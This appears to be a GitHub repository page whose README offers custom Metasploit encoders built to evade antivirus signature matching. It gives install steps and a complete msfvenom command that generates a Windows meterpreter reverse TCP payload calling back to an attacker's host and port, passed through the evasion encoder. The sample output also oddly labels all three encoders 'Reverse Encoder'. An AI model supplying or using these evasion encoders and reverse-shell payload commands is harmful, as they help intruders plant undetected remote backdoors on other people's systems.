Skip to content

Collection of Generic Metasploit Encoder to avoid AV RegEx Pattern Matching

License

Notifications You must be signed in to change notification settings

KlausMueller1996/Metasploit_GenericEncoders

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Metasploit_ReverseEncoder

Generic Metasploit Encoder that simply reverses the payload to avoid AV RegEx Pattern Matching

Setup

Place the *.rb file inside "/usr/share/metasploit-framework/modules/encoders/generic" folder.

Sample Usage

Try this to verify that Metasploit finds the encoder: msfvenom --list encoders

The resulting output should contain the following line

generic/reverse              normal     Reverse Encoder
generic/shuffle              normal     Reverse Encoder
generic/naturalword          normal     Reverse Encoder

Now encode your payload with -e generic/reverse, eg;

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=wlan0 LPORT=4444 -e generic/reverse -f raw -o payload.raw

Limitations:

This encoder only works with Framework Transform Formats (see msfvenom --list formats) and you need to provide your own decoder as part of the payload executable creation

About

Collection of Generic Metasploit Encoder to avoid AV RegEx Pattern Matching

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages